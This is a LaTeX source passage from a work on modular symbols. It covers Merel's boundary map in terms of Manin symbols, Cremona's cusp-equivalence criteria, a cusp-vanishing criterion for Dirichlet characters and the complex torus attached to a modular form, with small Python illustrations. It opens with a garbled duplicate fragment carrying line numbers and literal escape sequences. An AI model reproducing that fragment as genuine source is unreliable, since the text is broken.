Manin symbols}%\n818\\index{Manin symbols!and cuspidal subspace}%\n819\\index{Manin symbols!and boundary space}%\n820\\index{Cuspidal modular symbols!and Manin symbols}%\n821\\index{Boundary modular symbols!and Manin symbols}%\n822This section is a review of Merel's\\index{Merel} explicit description\n823of the boundary map in terms of Manin symbols\\index{Manin symbols}\n824for $\\Gamma=\\Gamma_1(N)$\n825(see~\\cite[\\S1.4]{merel:1585}). In the next section, we\n826describe a very efficient way to compute the boundary map.\n827\n828Let~$\\cR$ be the equivalence relation\n829on $\\Gamma\\backslash\\Q^2$ which identifies\n830the element\n831$[\\Gamma\\smallvtwo{\\lambda u}{\\lambda v}]$\n832with $\\sign(\\lambda)^k[\\Gamma\\smallvtwo{u}{v}]$,\n833for any $\\lambda\\in\\Q^*$. Denote by $B_k(\\Gamma)$\n834the finite dimensional $\\Q$-vector space\n835with basis the equivalence classes\n836$(\\Gamma\\backslash\\Q^2)/\\cR$.\n837The dimension of this space is $\\#(\\Gamma\\backslash\\P^1(\\Q))$.\n838\\begin{proposition}\n839The map\n840$$\\mu:\\sB_k(\\Gamma)\\ra B_k(\\Gamma), 841\\qquad P\\left\\{\\frac{u}{v}\\right\\}\\mapsto 842 P(u,v)\\left[\\Gamma\\vtwo{u}{v}\\right]$$\n843is well defined and injective.\n844Here $u$ and $v$ are assumed coprime.\n845\\end{proposition}\n846Thus the kernel of $\\delta:\\sS_k(\\Gamma)\\ra \\sB_k(\\Gamma)$\n847is the same as the kernel of $\\mu\\circ \\delta$.\n848\\begin{proposition}\\label{prop:boundary}\n849Let $P\\in V_{k-2}$ and $g=\\abcd{a}{b}{c}{d}\\in\\sltwoz$. 
\subsection{The cuspidal and boundary spaces in terms of Manin symbols}%
\index{Manin symbols!and cuspidal subspace}%
\index{Manin symbols!and boundary space}%
\index{Cuspidal modular symbols!and Manin symbols}%
\index{Boundary modular symbols!and Manin symbols}%
This section is a review of Merel's\index{Merel} explicit description
of the boundary map in terms of Manin symbols\index{Manin symbols}
for $\Gamma=\Gamma_1(N)$
(see~\cite[\S1.4]{merel:1585}).  In the next section, we
describe a very efficient way to compute the boundary map.

Let~$\cR$ be the equivalence relation
on $\Gamma\backslash\Q^2$ that identifies
the element
$[\Gamma\smallvtwo{\lambda u}{\lambda v}]$
with $\sign(\lambda)^k[\Gamma\smallvtwo{u}{v}]$,
for any $\lambda\in\Q^*$.  Denote by $B_k(\Gamma)$
the finite-dimensional $\Q$-vector space
with basis the equivalence classes
$(\Gamma\backslash\Q^2)/\cR$.
The dimension of this space is $\#(\Gamma\backslash\P^1(\Q))$.
\begin{proposition}
The map
$$\mu:\sB_k(\Gamma)\ra B_k(\Gamma),
\qquad P\left\{\frac{u}{v}\right\}\mapsto
  P(u,v)\left[\Gamma\vtwo{u}{v}\right]$$
is well defined and injective.
Here $u$ and $v$ are assumed coprime.
\end{proposition}
Thus the kernel of $\delta:\sM_k(\Gamma)\ra \sB_k(\Gamma)$
is the same as the kernel of $\mu\circ \delta$.
\begin{proposition}\label{prop:boundary}
Let $P\in V_{k-2}$ and $g=\abcd{a}{b}{c}{d}\in\sltwoz$.  We have
$$\mu\circ\delta([P,(c,d)])
  = P(1,0)[\Gamma\smallvtwo{a}{c}]
   -P(0,1)[\Gamma\smallvtwo{b}{d}].$$
\end{proposition}
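The formula of Proposition~\ref{prop:boundary} is straightforward to
evaluate in practice.  The sketch below (our own illustration, with ad hoc
names) completes the pair $(c,d)$ to a matrix in $\sltwoz$ by the extended
Euclidean algorithm and returns the two weighted cusps; identifying
equivalent cusp classes is the subject of the next subsection, so here a
cusp is recorded simply as an integer pair, and the polynomial~$P$ is
passed as a Python function of two arguments.
\begin{verbatim}
from math import gcd

def xgcd(a, b):
    """Extended Euclid: (g, x, y) with a*x + b*y = g."""
    if b == 0:
        return (abs(a), 1 if a > 0 else -1, 0) if a else (0, 0, 0)
    g, x, y = xgcd(b, a % b)
    return g, y, x - (a // b) * y

def complete_to_sl2(c, d):
    """Return (a, b) with a*d - b*c = 1, assuming gcd(c, d) = 1."""
    g, x, y = xgcd(d, c)
    assert g == 1
    return x, -y          # x*d + y*c = 1, so x*d - (-y)*c = 1

def boundary(P, c, d):
    """mu(delta([P, (c, d)])) as a list of (coefficient, cusp) pairs;
    a cusp is recorded as the pair (numerator, denominator)."""
    a, b = complete_to_sl2(c, d)
    return [(P(1, 0), (a, c)), (-P(0, 1), (b, d))]

if __name__ == "__main__":
    P = lambda X, Y: X**2          # a weight-4 example: P(X, Y) = X^2
    print(boundary(P, 2, 5))       # [(1, (1, 2)), (0, (2, 5))]
\end{verbatim}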
\subsection{Computing the boundary map}%
\index{Boundary map}%
\label{sec:computeboundary}%
In this section we describe how to compute the
map $\delta:\sM_k(N,\eps)\ra B_k(N,\eps)$
given in the previous section.
The algorithm presented here
generalizes the one in~\cite[\S2.2]{cremona:algs}.
To compute the image of $[P,(c,d)]$, with
$g=\abcd{a}{b}{c}{d}\in\sltwoz$,
we must compute the class of $[\smallvtwo{a}{c}]$ and of
$[\smallvtwo{b}{d}]$.
Instead of finding a canonical form for cusps, we
use a quick test for equivalence modulo scalars.
In the following algorithm, by the $i$th standard
cusp\index{Cusps!and boundary map} we mean
the $i$th basis vector for a basis of $B_k(N,\eps)$.  The
basis is constructed as the algorithm is called successively.
We first give the algorithm, then prove the facts
used by the algorithm in testing equivalence.

\begin{algorithm}\label{alg:cusplist}
\index{Algorithm for computing!cusps}
Given a cusp $[\smallvtwo{u}{v}]$, this algorithm computes an
integer~$i$ and a scalar~$\alp$ such that $[\smallvtwo{u}{v}]$ is
equivalent to~$\alp$ times the $i$th standard cusp.  First, using
Proposition~\ref{prop:cusp1} and Algorithm~\ref{alg:cusp1}, check
whether or not $[\smallvtwo{u}{v}]$ is equivalent, modulo scalars, to
any cusp found so far.  If so, return the index of the representative
and the scalar.  If not, record $\smallvtwo{u}{v}$ in the
representative list.  Then, using Proposition~\ref{prop:cuspdies},
check whether or not $\smallvtwo{u}{v}$ is forced to equal zero by the
relations.  If it does not equal zero, return its position in the list
and the scalar~$1$.  If it equals zero, return the scalar~$0$ and the
position~$1$; keep $\smallvtwo{u}{v}$ in the list, and record that it
is zero.
\end{algorithm}

In the case considered in Cremona's book \cite{cremona:algs}, the
relations between cusps involve only the trivial character, so they do
not force any cusp classes to vanish.  Cremona gives the following two
criteria for equivalence.
\begin{proposition}[Cremona]\label{prop:cusp1}\index{Cremona}
Let $\smallvtwo{u_i}{v_i}$, $i=1,2$, be written so that
$\gcd(u_i,v_i)=1$.
\begin{enumerate}
\item There exists $g\in\Gamma_0(N)$ such that
  $g\smallvtwo{u_1}{v_1}=\smallvtwo{u_2}{v_2}$ if and only if
  $$s_1 v_2 \con s_2 v_1 \pmod{\gcd(v_1 v_2,N)},
  \qquad\text{where } s_j \text{ satisfies } u_j s_j\con 1\pmod{v_j}.$$
\item There exists $g\in\Gamma_1(N)$ such that
  $g\smallvtwo{u_1}{v_1}=\smallvtwo{u_2}{v_2}$ if and only if
  $$v_2 \con v_1 \pmod{N}\quad\text{ and }\quad u_2 \con u_1 \pmod{\gcd(v_1,N)}.$$
\end{enumerate}
\end{proposition}
\begin{proof}
The first is Proposition 2.2.3 of \cite{cremona:algs}, and
the second is Lemma 3.2 of \cite{cremona:gammaone}.
\end{proof}

\begin{algorithm}\label{alg:cusp1}%
\index{Algorithm for computing!equivalent cusps}%
Suppose $\smallvtwo{u_1}{v_1}$ and
$\smallvtwo{u_2}{v_2}$
are equivalent modulo $\Gamma_0(N)$.
This algorithm computes a matrix $g\in\Gamma_0(N)$ such
that $g\smallvtwo{u_1}{v_1}=\smallvtwo{u_2}{v_2}$.
Let $s_1, s_2, r_1, r_2$ be solutions to
$s_1 u_1 -r_1 v_1 =1$ and
$s_2 u_2 -r_2 v_2 =1$.
Find integers $x_0$ and $y_0$ such
that $x_0v_1v_2+y_0N=1$.
Let $x=-x_0(s_1v_2-s_2v_1)/\gcd(v_1v_2,N)$
and $s_1' = s_1 + xv_1$.
Then $g=\mtwo{u_2}{r_2}{v_2}{s_2}
  \cdot \mtwo{u_1}{r_1}{v_1}{s_1'}^{-1}$
sends $\smallvtwo{u_1}{v_1}$ to $\smallvtwo{u_2}{v_2}$.
\end{algorithm}
\begin{proof}
This follows from the proof of Proposition~\ref{prop:cusp1} in
\cite{cremona:algs}.
\end{proof}
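In code, the two criteria of Proposition~\ref{prop:cusp1} translate
directly into tests on coprime pairs $(u,v)$.  The following Python sketch
(ours, with ad hoc names) normalizes so that $v\geq 0$, uses Python's
modular inverse \texttt{pow(u, -1, v)} (available in Python~3.8 and later)
to produce the~$s_j$, and treats the cusp $\infty=\smallvtwo{1}{0}$ and
the case $v=1$ separately.
\begin{verbatim}
from math import gcd

def normalize(u, v):
    """Scale a coprime pair (u, v) so that v >= 0 (and u = 1 if v = 0)."""
    assert gcd(u, v) == 1
    if v < 0 or (v == 0 and u < 0):
        u, v = -u, -v
    return u, v

def gamma0_equivalent(c1, c2, N):
    """Criterion (1): are the cusps c1 = (u1, v1) and c2 = (u2, v2)
    equivalent under Gamma_0(N)?"""
    (u1, v1), (u2, v2) = normalize(*c1), normalize(*c2)
    # s_j with u_j s_j = 1 (mod v_j); any s works mod 1, and for the
    # cusp infinity (v = 0) we have u = 1, so s = u is always valid.
    s1 = pow(u1, -1, v1) if v1 > 1 else u1
    s2 = pow(u2, -1, v2) if v2 > 1 else u2
    return (s1 * v2 - s2 * v1) % gcd(v1 * v2, N) == 0

def gamma1_equivalent(c1, c2, N):
    """Criterion (2): equivalence under Gamma_1(N)."""
    (u1, v1), (u2, v2) = normalize(*c1), normalize(*c2)
    return (v2 - v1) % N == 0 and (u2 - u1) % gcd(v1, N) == 0

if __name__ == "__main__":
    # 0 = (0, 1) and infinity = (1, 0) are Gamma_0(11)-inequivalent,
    # while 1/11 is equivalent to infinity:
    print(gamma0_equivalent((0, 1), (1, 0), 11))   # False
    print(gamma0_equivalent((1, 11), (1, 0), 11))  # True
\end{verbatim}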
To see how the~$\eps$-relations, for nontrivial~$\eps$,
make the situation more complicated, observe that it is
possible that $\eps(\alp)\neq \eps(\beta)$ but
$$\eps(\alp)\left[\vtwo{u}{v}\right] =\left[\gamma_\alp \vtwo{u}{v}\right]=
   \left[\gamma_\beta \vtwo{u}{v}\right]=\eps(\beta)\left[\vtwo{u}{v}\right].$$
One way out of this difficulty is to construct
the cusp classes for $\Gamma_1(N)$, and then quotient
out by the additional~$\eps$-relations using
Gaussian elimination.  This is far too
inefficient to be useful in practice, because the number of
$\Gamma_1(N)$ cusp classes can be unreasonably large.
Instead, we give a quick test to determine whether or not
a cusp vanishes modulo the $\eps$-relations.

\begin{lemma}\label{lem:canlift}
Suppose $\alp$ and $\alp'$ are integers
such that $\gcd(\alp,\alp',N)=1$.
Then there exist integers $\beta$ and $\beta'$,
congruent to $\alp$ and $\alp'$ modulo $N$, respectively,
such that $\gcd(\beta,\beta')=1$.
\end{lemma}
\begin{proof}
By \cite[1.38]{shimura:intro} the map
$\SL_2(\Z)\ra\SL_2(\Z/N\Z)$ is surjective.
By the Euclidean algorithm, there exist
integers $x$, $y$ and $z$ such that
$x\alp + y\alp' + zN = 1$.
Consider the matrix
$\abcd{y}{-x}{\alp}{\hfill\alp'}\in \SL_2(\Z/N\Z)$,
and take $\beta$, $\beta'$ to be the bottom
row of a lift of this matrix to $\SL_2(\Z)$.
\end{proof}
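In practice one can also find such a pair $(\beta,\beta')$ by a naive
search within the two congruence classes, rather than by lifting a matrix
from $\SL_2(\Z/N\Z)$ as in the proof; the following sketch (ours, offered
purely as an illustration) does exactly that.
\begin{verbatim}
from math import gcd
from itertools import count

def lift_to_coprime(alpha, alpha_p, N):
    """Return (beta, beta') congruent to (alpha, alpha') mod N with
    gcd(beta, beta') = 1.  Naive search, not the matrix lift of the proof."""
    assert gcd(gcd(alpha, alpha_p), N) == 1
    beta = alpha if alpha != 0 else N        # any nonzero lift of alpha works
    for k in count():                        # some k always succeeds
        if gcd(beta, alpha_p + k * N) == 1:
            return beta, alpha_p + k * N

if __name__ == "__main__":
    print(lift_to_coprime(6, 3, 5))   # e.g. (6, 13): 13 = 3 (mod 5), gcd(6, 13) = 1
\end{verbatim}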
\begin{proposition}\label{prop:cuspdies}\index{Cusps!criterion for vanishing}
Let~$N$ be a positive integer and~$\eps$ a Dirichlet
character\index{Dirichlet character!and cusps} of modulus~$N$.
Suppose $\smallvtwo{u}{v}$ is a cusp with $u$ and $v$ coprime.
Then $\smallvtwo{u}{v}$ vanishes modulo the relations
$$\left[\gamma\smallvtwo{u}{v}\right]=
\eps(\gamma)\left[\smallvtwo{u}{v}\right],\qquad
\text{all } \gamma\in\Gamma_0(N),$$
if and only if there exists $\alp\in(\Z/N\Z)^*$,
with $\eps(\alp)\neq 1$, such that
\begin{align*}
  v &\con \alp v \pmod{N},\\
  u &\con \alp u \pmod{\gcd(v,N)}.
\end{align*}
\end{proposition}
\begin{proof}
First suppose such an~$\alp$ exists.
By Lemma~\ref{lem:canlift}
there exist $\beta, \beta'\in\Z$ lifting
$\alp,\alp^{-1}$ such that $\gcd(\beta,\beta')=1$.
The cusp $\smallvtwo{\beta u}{\beta' v}$
has coprime coordinates, so,
by Proposition~\ref{prop:cusp1} and our
congruence conditions on~$\alp$, the cusps
$\smallvtwo{\beta{}u}{\beta'{}v}$
and $\smallvtwo{u}{v}$ are equivalent by
an element of $\Gamma_1(N)$.
This implies that $\left[\smallvtwo{\beta{}u}{\beta'{}v}\right]
  =\left[\smallvtwo{u}{v}\right]$.
Since $\left[\smallvtwo{\beta{}u}{\beta'{}v}\right]
  = \eps(\alp)\left[\smallvtwo{u}{v}\right]$,
our assumption that $\eps(\alp)\neq 1$
forces $\left[\smallvtwo{u}{v}\right]=0$.

Conversely, suppose $\left[\smallvtwo{u}{v}\right]=0$.
Because all relations are two-term relations, and the
$\Gamma_1(N)$-relations identify $\Gamma_1(N)$-orbits,
there must exist $\alp$ and $\beta$ with
  $$\left[\gamma_\alp \vtwo{u}{v}\right]
   =\left[\gamma_\beta \vtwo{u}{v}\right]
   \qquad\text{ and }\qquad \eps(\alp)\ne \eps(\beta).$$
Indeed, if this did not occur,
then we could mod out by the $\eps$-relations by writing
each $\left[\gamma_\alp \smallvtwo{u}{v} \right]$
in terms of $\left[\smallvtwo{u}{v}\right]$, and there would
be no further relations left to kill
$\left[\smallvtwo{u}{v}\right]$.
Next observe that
$$\left[\gamma_{\beta^{-1}\alp}
      \vtwo{u}{v}\right]
  = \left[\gamma_{\beta^{-1}}\gamma_\alp
      \vtwo{u}{v}\right]
  = \eps(\beta^{-1})\left[\gamma_\alp
      \vtwo{u}{v}\right]
  = \eps(\beta^{-1})\left[\gamma_\beta
      \vtwo{u}{v}\right]
  = \left[\vtwo{u}{v}\right].$$
Applying Proposition~\ref{prop:cusp1} and
noting that $\eps(\beta^{-1}\alp)\neq 1$ shows
that $\beta^{-1}\alp$ satisfies the properties
of the ``$\alp$'' in the statement of the
proposition we are proving.
\end{proof}

We enumerate the possible~$\alp$ appearing
in Proposition~\ref{prop:cuspdies} as follows.
Let $g=\gcd(v,N)$ and list the
$\alp=\frac{N}{g}\cdot{}a+1$, for $a=0,\ldots,g-1$,
such that $\eps(\alp)\neq 0$.
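Combining Proposition~\ref{prop:cuspdies} with this enumeration gives a
quick vanishing test.  In the sketch below (ours), the character~$\eps$ is
passed as a Python function on integers coprime to~$N$; the character used
in the example at the end is an assumption purely for illustration.
\begin{verbatim}
from math import gcd

def cusp_vanishes(u, v, N, eps):
    """Does the cusp (u, v), with gcd(u, v) = 1, vanish modulo the
    eps-relations?  Runs over the candidates alpha = 1 + a*N/g,
    g = gcd(v, N), and applies the criterion of the proposition."""
    g = gcd(v, N)
    for a in range(g):
        alpha = 1 + a * (N // g)        # alpha * v = v (mod N) automatically
        if gcd(alpha, N) != 1:          # eps(alpha) = 0: not a unit, skip
            continue
        if eps(alpha) != 1 and ((alpha - 1) * u) % g == 0:
            return True
    return False

if __name__ == "__main__":
    # Example with the quadratic character mod 4 (eps(1) = 1, eps(3) = -1):
    eps = lambda a: 1 if a % 4 == 1 else -1
    print(cusp_vanishes(1, 2, 4, eps))  # True: the cusp 1/2 dies here
\end{verbatim}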
{\vspace{3ex}\em\par\noindent Working in the
plus one\index{Plus-one quotient} or
minus one quotient\index{Minus-one quotient}.}
Let~$s$ be a sign, either~$+1$ or~$-1$.
To compute $\sS_k(N,\eps)_s$ it is necessary
to replace $B_k(N,\eps)$ by its quotient modulo the
additional relations
$\left[ \smallvtwo{-u}{\hfill v}\right]
= s \left[\smallvtwo{u}{v}\right]$
for all cusps $\smallvtwo{u}{v}$.
Algorithm~\ref{alg:cusplist} can be modified to deal
with this situation as follows.
Given a cusp $x=\smallvtwo{u}{v}$, proceed as
in Algorithm~\ref{alg:cusplist} and check whether
either $\smallvtwo{u}{v}$ or $\smallvtwo{-u}{\hfill v}$
is equivalent (modulo scalars) to any cusp seen so far.  If not,
use the following trick to determine whether
the $\eps$- and $s$-relations
kill the class of $\smallvtwo{u}{v}$:
use the unmodified Algorithm~\ref{alg:cusplist}
to compute the scalars $\alp_1, \alp_2$ and
standard indices $i_1$, $i_2$ associated to
$\smallvtwo{u}{v}$ and $\smallvtwo{-u}{\hfill v}$, respectively.
The $s$-relation kills the class of $\smallvtwo{u}{v}$
if and only if $i_1=i_2$ but $\alp_1\neq s\alp_2$.


\section{The complex torus attached to a modular form}%
\index{Complex torus}%
\index{Modular forms!associated complex torus}%
\label{sec:tori}%
Fix integers $N\geq 1$, $k\geq 2$, and let~$\eps$ be a mod~$N$
Dirichlet character\index{Dirichlet character}.
For the rest of this section assume that $\eps^2=1$.

We construct a lattice in $\Hom(S_k(N,\eps),\C)$ that is invariant
under complex conjugation and under the action of the Hecke
operators.\index{Hecke operators}  The quotient of
$\Hom(S_k(N,\eps),\C)$ by this lattice is a complex torus
$J_k(N,\eps)$, which is equipped with an action of the Hecke operators
and of complex conjugation.

The reader may wish to compare our construction with a closely related
construction of Shimura\index{Shimura}~\cite{shimura:surles}.  Shimura
also gave his
torus the structure of an abelian variety over~$\C$.  Note that his
torus is, a priori, different from our torus.  We do not know whether
our torus has the structure of an abelian variety over~$\C$.

When $k=2$, the torus $J_2(N,\eps)$ is the set of complex points of an
abelian variety, which is actually defined over $\Q$; when $k>2$,
the study of these complex tori is of interest in trying to understand the
conjectures of Bloch and Kato (see \cite{bloch-kato})%
\index{Conjecture!Bloch and Kato}%
\index{Bloch and Kato conjecture} on motifs\index{Motifs} attached
to modular forms\index{Modular forms}.

Let $\sS=\sS_k(N,\eps)$ (respectively, $S=S_k(N,\eps)$)
be the space of cuspidal modular symbols (respectively, cusp forms)
of weight~$k$, level~$N$, and character~$\eps$.
The Hecke algebra~$\T$\index{Hecke algebra!and integration pairing}
acts in a way compatible with the
integration pairing\index{Integration pairing!and complex torus}
$\langle\,,\,\rangle
  : S \cross \sS \ra \C$.
This pairing induces a $\T$-module
homomorphism $\Phi:\sS\ra S^*=\Hom_\C(S,\C)$,
called the \defn{period mapping}.%
\index{Period mapping|textit}
Because $\eps^2=1$, the $*$-involution\index{Star involution} preserves~$S$.
\begin{proposition}
The period mapping~$\Phi$\index{Period mapping!is injective}
is injective, and $\Phi(\sS)$ is a lattice in~$S^*$.
\end{proposition}
\begin{proof}
By Theorem~\ref{thm:perfectpairing},
  $$\sS\tensor_{\R}\C\isom
    \Hom_\C(S\oplus \Sbar,\C).$$
Because $\eps^2=1$, we have $S = S_k(N,\eps;\R)\tensor_{\R}\C$.
Set $S_\R := S_k(N,\eps;\R)$ and likewise define $\Sbar_\R$.
We have
$$\Hom_\C(S\oplus \Sbar,\C) =
   \Hom_\R(S_\R \oplus \Sbar_\R,\R)\tensor_\R \C.$$
Let $\sS_{\R} = \sS_k(N,\eps;\R)$ and let $\sS_{\R}^+$ be the
subspace fixed under~$*$.  By Proposition~\ref{prop:starpairing}
we have maps
$$\sS_{\R}^+ \ra \Hom_{\R}(S_{\R}\oplus\Sbar_\R,\R)
   \ra \Hom_{\R}(S_{\R},\R)$$
and
$$\sS_{\R}^- \ra \Hom_{\R}(S_{\R}\oplus\Sbar_\R,i\R)
   \ra \Hom_{\R}(S_{\R},i\R).$$
The map $\sS_{\R}^+\ra \Hom_{\R}(S_{\R},\R)$ is
an isomorphism: the point is that if
$\langle \bullet, x\rangle$, for $x\in \sS_{\R}^+$,
vanishes on $S_\R$, then it vanishes on the
whole of $S\oplus \Sbar$.  Likewise, the map
$\sS_{\R}^-\ra \Hom_{\R}(S_{\R},i\R)$
is an isomorphism.
Thus
$$\sS\tensor\R = \sS_{\R} \isom \Hom_{\R}(S_{\R},\R)
\oplus \Hom_{\R}(S_{\R},i\R)
\isom \Hom_{\C}(S,\C).$$
Finally, we observe that~$\sS$ is by definition
torsion free, which completes the proof.
\end{proof}

The torus $J_k(N,\eps)$ fits into an exact sequence
$$0\lra \sS \xrightarrow{\quad\Phi\quad}
   \Hom_\C(S,\C) \lra J_k(N,\eps) \lra 0.$$
Let $f\in S$ be a newform and $S_f$ the complex vector
space spanned by the Galois conjugates of~$f$.
The period map $\Phi_f$ associated to~$f$ is the map
$\sS\ra \Hom_\C(S_f,\C)$
obtained by composing~$\Phi$ with restriction to $S_f$.
Set
  $$A_f := \Hom_\C(S_f,\C) / \Phi_f(\sS).$$

We associate\label{pg:dual} to~$f$ a subtorus of~$J$ as follows.
\index{Complex torus!dual of}%
\index{Modular forms!associated subtorus}%
Let $I_f = \Ann_{\T}(f)$ be the annihilator
of~$f$ in the Hecke algebra\index{Hecke algebra}, and set
  $$\Adual_f := \Hom_\C(S,\C)[I_f]/\Phi(\sS[I_f]),$$
where $\Hom_\C(S,\C)[I_f] = \intersect_{t \in I_f} \ker(t)$.

The following diagram summarizes the tori just defined;
its columns are exact, but its rows need not be.
\begin{equation}\label{dgm:uniformization}
\xymatrix@R=.9pc{
 0\ar[d] & 0\ar[d] & 0\ar[d] \\
 \sS[I_f]\ar[r]\ar[dd] & \sS\ar[r]\ar[dd]&\Phi_f(\sS)\ar[dd] \\
 & & \\
\Hom_\C(S,\C)[I_f]\ar[r]\ar[dd] &\Hom_\C(S,\C)\ar[r]\ar[dd] &\Hom_\C(S[I_f],\C)\ar[dd]\\
 & & \\
\Adual_f \ar[r]\ar[d]& J_k(N,\eps) \ar[r]\ar[d]& A_f \ar[d]\\
 0 & 0 & 0 \\
}\end{equation}


\subsection{The case when the weight is $2$}%
\index{Complex torus!in weight two}%
When $k=2$ and $\eps=1$, the above is just Shimura's\index{Shimura}
classical association of an abelian variety to a modular
form\index{Modular forms}; see~\cite[Thm.~7.14]{shimura:intro}
and~\cite{shimura:factors}.  In this case $A_f$ and $\Adual_f$ are
abelian varieties that are defined over~$\Q$.  Furthermore, $A_f$ is an
\defn{optimal quotient}\index{Optimal quotient|textit} of~$J$, in the sense
that the kernel of the map $J\ra A_f$ is connected.
For a summary of the main results in this situation,
see Section~\ref{sec:optquoj0n}.
{"ft_lang_label":"__label__en","ft_lang_prob":0.5665488,"math_prob":0.99972445,"size":47565,"snap":"2020-45-2020-50","text_gpt3_token_len":17256,"char_repetition_ratio":0.14270096,"word_repetition_ratio":0.016750721,"special_character_ratio":0.33226112,"punctuation_ratio":0.11957093,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999522,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-12-03T11:33:34Z\",\"WARC-Record-ID\":\"<urn:uuid:5d6d244e-0146-486a-9bd2-4360021a8ad6>\",\"Content-Length\":\"629834\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:53f3c3c4-5bb9-4cd7-b909-5d7f1d7ca5c6>\",\"WARC-Concurrent-To\":\"<urn:uuid:16747229-ad13-4ff8-944b-f99f4f628486>\",\"WARC-IP-Address\":\"172.67.20.35\",\"WARC-Target-URI\":\"https://share.cocalc.com/share/5d54f9d642cd3ef1affd88397ab0db616c17e5e0/www/papers/thesis/src/modsyms.tex?viewer=share\",\"WARC-Payload-Digest\":\"sha1:4NCBSYVIONJPBNNNMXRJKVQA6QL6H7G2\",\"WARC-Block-Digest\":\"sha1:TD7GZPSIKMBHP6L2QOBANTQTRCWU5K76\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-50/CC-MAIN-2020-50_segments_1606141727627.70_warc_CC-MAIN-20201203094119-20201203124119-00710.warc.gz\"}"}